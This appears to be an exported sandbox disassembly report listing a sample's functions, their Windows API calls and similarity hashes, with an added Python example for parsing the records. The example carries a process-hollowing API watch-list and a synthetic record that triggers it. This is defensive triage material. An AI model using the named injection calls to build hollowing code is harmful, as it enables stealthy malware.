• Instruction ID: 38880fd6572229099b1e0dfb461247ceb66d1c89e36862a43f59f33f8cb6e260
• Opcode Fuzzy Hash: 206560a21e7653420da39caafce20ed01bc2e8c922614f8c83646a4c0d6d9dc4
• Instruction Fuzzy Hash: 82E0EC34F20265BDFA0052D6A800FD22A505B0C7D8F8084D7E7405B0A1D6A8C5D28F6C
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 0042C068
• GetVersion.KERNEL32(00000007,?,?,00000000,00000000,?,0000C000,00000000,00000000,00000007), ref: 0042C21B
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: H_prologVersion
• String ID:
• API String ID: 1836448879-0
• Opcode ID: 1e7bd92853b28cd1a8fdc541d7300b93a6b6b50eb318f4510f7bc62ddeef206c
• Instruction ID: 5f1e0b84fd10a6aad774d858520218bd5ddfa74f3397e226cba7e1f76148b756
• Opcode Fuzzy Hash: 1e7bd92853b28cd1a8fdc541d7300b93a6b6b50eb318f4510f7bc62ddeef206c
• Instruction Fuzzy Hash: 2BE19D70700225EBDB14EF55ECD1ABF37A8EF08314FA0851AF815DA281DB39DA11DB69
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID:
• String ID: $w
• API String ID: 0-1564209528
• Opcode ID: ca78ee85deb9cac06e8d29a47a06e25c92e6372e5d26db3cf25b85dd7cb782fa
• Instruction ID: 706524ec9c2ed56ddc1040b975a4221d8b0047791b716802c5582edfeaf28837
• Opcode Fuzzy Hash: ca78ee85deb9cac06e8d29a47a06e25c92e6372e5d26db3cf25b85dd7cb782fa
• Instruction Fuzzy Hash: E3F168B0D0021AEBDF14CF95C885BEEBBB5BF48314F21D15AE511AB281D7389A81CF65
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: Iconic
• String ID:
• API String ID: 110040809-0
• Opcode ID: 5745741be777b8c682683d4e1118cac93e2abbf4dee2a71bd048c0f7810c53d4
• Instruction ID: fd356119b0f5e1805246c1e60627eae280fa245f218770b7097e1a6b2c2794a3
• Opcode Fuzzy Hash: 5745741be777b8c682683d4e1118cac93e2abbf4dee2a71bd048c0f7810c53d4
• Instruction Fuzzy Hash: CAC08C70A1920CEB8708CF88E800C1DB7FCEB08321B0082DDFC0883300CA32EE008A98
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetUnhandledExceptionFilter.KERNEL32 ref: 00424EC1
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 058e9bac54c765fec20eca56afce03b233c84653d5bb80b615e3f3fc1e0d6c2e
• Instruction ID: 108043aa667b0e2dec700df90bfffadf0695a5696602e4d7b5ec83efbf675db2
• Opcode Fuzzy Hash: 058e9bac54c765fec20eca56afce03b233c84653d5bb80b615e3f3fc1e0d6c2e
• Instruction Fuzzy Hash:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
• Instruction ID: b5cba75e2ccb3f599b9d031728bfd560ec4bd997c6fdada36654579999dcd9a7
• Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
• Instruction Fuzzy Hash: 83B1AD75A0061ADFDB15CF04D5D0AA9BBA1FF48328F64C1AEC80A5B342D775EE46CB90
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 749def59540ea8172b0c03d07183d7e68b522f821a4efd5fb73b1de9d0969a1e
• Instruction ID: 6412ba3454d7caa3ccf8c1eb8c75b05bf3dc832fd6a347cbc3d8397c2cbfd44d
• Opcode Fuzzy Hash: 749def59540ea8172b0c03d07183d7e68b522f821a4efd5fb73b1de9d0969a1e
• Instruction Fuzzy Hash: E91104B5D00208AFCB04DF94D8819AEB7B5BB48300F2484AAD809A7301E734EF54CF92
Uniqueness

Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 82428a06129f0725db19307c150047b4c39713eb8a06e81b1d8ae44c8b984a54
                                                                                • Instruction ID: eb05f924cac9e2cd43bda79ffc6b72cf78f2e1a1432b488b5c2c4d500a86cba7
                                                                                • Opcode Fuzzy Hash: 82428a06129f0725db19307c150047b4c39713eb8a06e81b1d8ae44c8b984a54
                                                                                • Instruction Fuzzy Hash: 001104B5D40208EFCB14DF94D8819AEB7B5BB4C300F2485AAD819A7341E634AF55CF92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 34f07fc11ea3be595edf0570006f9ed60ff909c28cad2b300e1ed09bc833a650
                                                                                • Instruction ID: 77d9a9fb65cb97d3c038e7a52c9602304c00cae3818c77ba78c371bfac5425de
                                                                                • Opcode Fuzzy Hash: 34f07fc11ea3be595edf0570006f9ed60ff909c28cad2b300e1ed09bc833a650
                                                                                • Instruction Fuzzy Hash: 79B00239661540CFCA55CF08C194E00F3F4FB58760B068491EC05CB722C234ED40CA40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d794bf1f07835c3b10fea10e438be3f5a82aefe50a0e308fa37c15277350eef3
                                                                                • Instruction ID: 08eb0ad0d3f855e474f3ff173f69043067d91ea7c285dfdd00ec0894cc9890fd
                                                                                • Opcode Fuzzy Hash: d794bf1f07835c3b10fea10e438be3f5a82aefe50a0e308fa37c15277350eef3
                                                                                • Instruction Fuzzy Hash: ABB00279661550CFCA51CB08C294E10F3F4FB48770B068591EC09CB722C234ED40CA01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fb1dcb45eca10bbd415de50d8dac458e7e42156cf4c282332bc7bc400f2a61b4
                                                                                • Instruction ID: 09a661d3bcde169e3a68bda8983e2d082d1c510c2daa6ab026a58b72df35bac7
                                                                                • Opcode Fuzzy Hash: fb1dcb45eca10bbd415de50d8dac458e7e42156cf4c282332bc7bc400f2a61b4
                                                                                • Instruction Fuzzy Hash: 3AA00235692980CFCE16CF08C290F0073B4F754B40F010490E401C7A21C228ED40C940
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetWindowLongA.USER32 ref: 00428BA4
                                                                                • GetParent.USER32(?), ref: 00428BBD
                                                                                • SetBkMode.GDI32(?,00000002), ref: 00428BCD
                                                                                • GetClientRect.USER32 ref: 00428BDF
                                                                                • SendMessageA.USER32 ref: 00428C07
                                                                                • SelectObject.GDI32(?,00000000), ref: 00428C17
                                                                                  • Part of subcall function 00428850: InflateRect.USER32(?,000000FF,000000FF), ref: 00428892
                                                                                  • Part of subcall function 00428850: IsWindowEnabled.USER32(?), ref: 004288A5
                                                                                  • Part of subcall function 00428850: InflateRect.USER32(?,000000FF,000000FF), ref: 004288CC
                                                                                  • Part of subcall function 00428850: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004288E3
                                                                                  • Part of subcall function 00428850: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004288FC
                                                                                  • Part of subcall function 00428850: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00428914
                                                                                  • Part of subcall function 00428850: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0042892E
                                                                                  • Part of subcall function 00428850: SelectObject.GDI32(?,00000000), ref: 00428953
                                                                                • GetSysColor.USER32(0000000F), ref: 00428C29
                                                                                • SetBkColor.GDI32(?,00000000), ref: 00428C2D
                                                                                • GetSysColor.USER32(00000012), ref: 00428C35
                                                                                • SetTextColor.GDI32(?,00000000), ref: 00428C39
                                                                                • SendMessageA.USER32 ref: 00428C4B
                                                                                • SelectObject.GDI32(?,00000000), ref: 00428C53
                                                                                • IntersectClipRect.GDI32(?,?,?,?,?), ref: 00428C78
                                                                                • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00428CB0
                                                                                • IsWindowEnabled.USER32(?), ref: 00428CB7
                                                                                • SendMessageA.USER32 ref: 00428CCB
                                                                                • GetWindowTextA.USER32 ref: 00428D39
                                                                                • SelectObject.GDI32(?,?), ref: 0042908F
                                                                                • SelectObject.GDI32(?,00000000), ref: 004290A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ObjectSelect$ColorRectWindow$MessageSend$EnabledInflateText$ClientClipIntersectLongModeParent
                                                                                • String ID:
                                                                                • API String ID: 2549663215-0
                                                                                • Opcode ID: a9c174a17e16bae0cc4d3d62f3dd64787f12c19678e3b306853782825521580b
                                                                                • Instruction ID: 93173b2fc57c215b2f73895c902e304185b7d0f425fe4c4ab5f1868347d98ed2
                                                                                • Opcode Fuzzy Hash: a9c174a17e16bae0cc4d3d62f3dd64787f12c19678e3b306853782825521580b
                                                                                • Instruction Fuzzy Hash: 90F158B1208301AFD304DF64DD88A6FB7F8FB88705F40492DF68186251DB79EA45CB5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$MessageSend$CaretLongMetricsReleaseSystem$ClientParentRectScreenShow$ClassHideNamePointslstrcmp
                                                                                • String ID: ComboBox
                                                                                • API String ID: 930961256-1152790111
                                                                                • Opcode ID: 8f2b197bd65f0a043a6b92a79a55198d3b6ef1b4b6b81643ad33dd3d086e3224
                                                                                • Instruction ID: 9a16b6aebf19d18f6321c2df1a78772bd02d21516cb3fd94b97d1bf1a82e3f7f
                                                                                • Opcode Fuzzy Hash: 8f2b197bd65f0a043a6b92a79a55198d3b6ef1b4b6b81643ad33dd3d086e3224
                                                                                • Instruction Fuzzy Hash: 2991D171608301AFE3109F64EC49F7FB7E8EB84709F40082EFA4196281DB78DA45CB5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0044E660,?,?,?,?,?,?,?,?,?,?,?,?,00427047), ref: 00427ADB
                                                                                • GetDC.USER32(00000000), ref: 00427AE3
                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00427AF4
                                                                                • GetDeviceCaps.GDI32(00000000,0000000E), ref: 00427AFB
                                                                                • GetSystemMetrics.USER32 ref: 00427B19
                                                                                • GetSystemMetrics.USER32 ref: 00427B24
                                                                                • ReleaseDC.USER32 ref: 00427B3A
                                                                                • GlobalAddAtomA.KERNEL32 ref: 00427B54
                                                                                • LeaveCriticalSection.KERNEL32(0044E660,?,?,?,?,?,?,?,?,?,?,?,?,00427047), ref: 00427B70
                                                                                • GlobalAddAtomA.KERNEL32 ref: 00427B87
                                                                                • GlobalAddAtomA.KERNEL32 ref: 00427B99
                                                                                • GlobalAddAtomA.KERNEL32 ref: 00427BA6
                                                                                • GlobalAddAtomA.KERNEL32 ref: 00427BCA
                                                                                • GlobalAddAtomA.KERNEL32 ref: 00427BD7
                                                                                • GlobalAddAtomA.KERNEL32 ref: 00427BFB
                                                                                • GetSystemMetrics.USER32 ref: 00427C0E
                                                                                • GetClassInfoA.USER32 ref: 00427C51
                                                                                • GetClassInfoA.USER32 ref: 00427C6E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AtomGlobal$MetricsSystem$CapsClassCriticalDeviceInfoSection$EnterLeaveRelease
                                                                                • String ID: Button$C3d$C3dD$C3dH$C3dHNew$C3dL$C3dLNew$C3dNew
                                                                                • API String ID: 1233821986-2558600121
                                                                                • Opcode ID: 39cb75dea45708cd1ff5e8fec15b53ac4dbdfa068dec4ba5e57ff832b4ee32a4
                                                                                • Instruction ID: 66779ac86e72c6dddd43edfefee93dfe431c375f38cf9c836ce35f91e100b3cf
                                                                                • Opcode Fuzzy Hash: 39cb75dea45708cd1ff5e8fec15b53ac4dbdfa068dec4ba5e57ff832b4ee32a4
                                                                                • Instruction Fuzzy Hash: 6C410A38B443149AF7109F65FC82B667BA0FB54715FD20437E900833A0DBBC99468BAD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
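The per-function records above follow one fixed plain-text layout: an APIs list of `Name.MODULE(args), ref: ADDR` bullets (indented `Part of subcall function XXXXXXXX:` entries belong to a callee), an optional Strings list, a Memory Dump Source block naming the .sdmp the code was read from and its image base, a Similarity block whose `String ID` field carries the referenced strings joined with `$`, and a closing `Uniqueness Score` line. When triaging a report like this one it is faster to pull every record into a structure and screen the call sets than to read hundreds of blocks by eye. The parser below is an added example, not part of this report and not Joe Security tooling; it assumes only the layout visible on this page (including the `Download File` link label the raw HTML export leaves on each Associated line). The embedded sample is constructed: its first two records are trimmed from the listing on this page, the third record (source `constructed.sdmp`) is synthetic and exists only to show a watch-list hit, and `HOLLOWING_WATCHLIST` is this example's own list of APIs commonly seen together in process hollowing, not a list the report provides. The `-1.00%` uniqueness value is parsed as a number and not interpreted.

```python
# Added example (not from the report, not Joe Security tooling): parse the per-function
# records of a Joe Sandbox disassembly listing into dicts and screen them by API set.
import re
from typing import Dict, List

# "GetParent.USER32(?), ref: 00428BBD"  or  "GetWindowLongA.USER32 ref: 00428BA4"
API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]{8})$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<callee>[0-9A-Fa-f]{8}):\s*(?P<rest>.+)$")
# Assumption: APIs that commonly appear together in process hollowing; not a list the report provides.
HOLLOWING_WATCHLIST = frozenset({"NtUnmapViewOfSection", "NtMapViewOfSection", "VirtualAllocEx",
                                 "WriteProcessMemory", "SetThreadContext", "ResumeThread", "QueueUserAPC"})

def parse_api_line(line: str):
    """One API bullet -> dict, or None. Subcall entries keep the callee they belong to."""
    text, callee = line.strip().lstrip("•").strip(), None
    m = SUBCALL_RE.match(text)
    if m:
        callee, text = m.group("callee").upper(), m.group("rest")
    m = API_RE.match(text)
    if not m:
        return None
    return {"name": m.group("name"), "module": m.group("module").upper(), "ref": m.group("ref").upper(),
            "args": m.group("args").split(",") if m.group("args") else [], "subcall_of": callee}

def parse_records(text: str) -> List[Dict]:
    """Split the listing into records; the 'Uniqueness Score' line closes each one."""
    new = lambda: {"apis": [], "source_file": None, "base": None, "associated": [], "similarity": {}}
    records, cur, section = [], new(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in ("APIs", "Strings", "Memory Dump Source", "Similarity", "Uniqueness"):
            section = line
            continue
        body = line.lstrip("•").strip()
        if body.startswith("Uniqueness Score:"):
            cur["uniqueness_score"] = float(body.split(":", 1)[1].strip().rstrip("%"))
            records.append(cur)
            cur, section = new(), None
        elif section == "APIs":
            api = parse_api_line(line)
            if api:
                cur["apis"].append(api)
        elif section == "Memory Dump Source":
            if body.startswith("Source File:"):
                cur["source_file"] = body.split(":", 1)[1].split(",")[0].strip()
                off = re.search(r"Offset:\s*([0-9A-Fa-f]+)", body)
                cur["base"] = int(off.group(1), 16) if off else None
            elif body.startswith("Associated:"):  # the HTML export leaves a 'Download File' link label here
                cur["associated"].append(body.split(":", 1)[1].replace("Download File", "").strip())
        elif section == "Similarity" and ":" in body:
            key, value = body.split(":", 1)
            cur["similarity"][key.strip().lower().replace(" ", "_")] = value.strip()
    return records

def record_strings(rec: Dict) -> List[str]:
    """The '$'-joined String ID field as a list (empty when the field is blank)."""
    return [s for s in rec["similarity"].get("string_id", "").split("$") if s]

def api_names(rec: Dict, include_subcalls: bool = False) -> set:
    return {a["name"] for a in rec["apis"] if include_subcalls or a["subcall_of"] is None}

def flag_records(records: List[Dict], watchlist) -> List[Dict]:
    """Records whose call set (subcalls included) intersects the watch-list, keyed by lowest direct ref."""
    out = []
    for rec in records:
        hits = sorted(api_names(rec, True) & set(watchlist))
        if hits:
            direct = [a["ref"] for a in rec["apis"] if a["subcall_of"] is None]
            out.append({"first_ref": min(direct) if direct else None, "hits": hits})
    return out

# Constructed sample in the page's layout: the first two records are trimmed from this
# report's listing, the third is synthetic (not from this report) to show a watch-list hit.
SAMPLE = """\
APIs
• EnterCriticalSection.KERNEL32(0044E660,?,00427047), ref: 00427ADB
• GlobalAddAtomA.KERNEL32 ref: 00427B54
• GlobalAddAtomA.KERNEL32 ref: 00427B87
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
Similarity
• String ID: Button$C3d$C3dD$C3dH$C3dHNew$C3dL$C3dLNew$C3dNew
• API String ID: 1233821986-2558600121
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00426D60: SetBkColor.GDI32(?), ref: 00426D7D
  • Part of subcall function 00426D60: ExtTextOutA.GDI32(?,00000000,00000002,?), ref: 00426DCA
• PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004288E3
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• String ID:
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtUnmapViewOfSection.NTDLL(?,00400000), ref: 00401250
• WriteProcessMemory.KERNEL32(?,00400000,?,?,?), ref: 00401270
• ResumeThread.KERNEL32(?), ref: 004012A0
Memory Dump Source
• Source File: constructed.sdmp, Offset: 00400000, based on PE: true
Uniqueness

Uniqueness Score: -1.00%
"""
```

Run `parse_records` over the text of the whole listing (copied out of the report), then `flag_records` with a watch-list suited to the behaviour you are hunting; `first_ref` is the lowest direct call-site address in the record, which is a convenient handle for jumping to the function in a disassembler loaded at the record's `base`.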

                                                                                APIs
                                                                                  • Part of subcall function 00426D60: SetBkColor.GDI32(?), ref: 00426D7D
                                                                                  • Part of subcall function 00426D60: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00426DCA
                                                                                  • Part of subcall function 00426D60: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00426DF9
                                                                                  • Part of subcall function 00426D60: SetBkColor.GDI32(?,?), ref: 00426E17
                                                                                  • Part of subcall function 00426D60: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00426E42
                                                                                  • Part of subcall function 00426D60: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00426E7C
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00428892
                                                                                • IsWindowEnabled.USER32(?), ref: 004288A5
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004288CC
                                                                                • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004288E3
                                                                                • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004288FC
                                                                                • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00428914
                                                                                • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0042892E
                                                                                • SelectObject.GDI32(?,00000000), ref: 00428953
                                                                                • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00428977
                                                                                • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00428997
                                                                                • SelectObject.GDI32(?,00000000), ref: 004289AD
                                                                                • PatBlt.GDI32(?,00000000,?,?,00000001,00F00021), ref: 004289DB
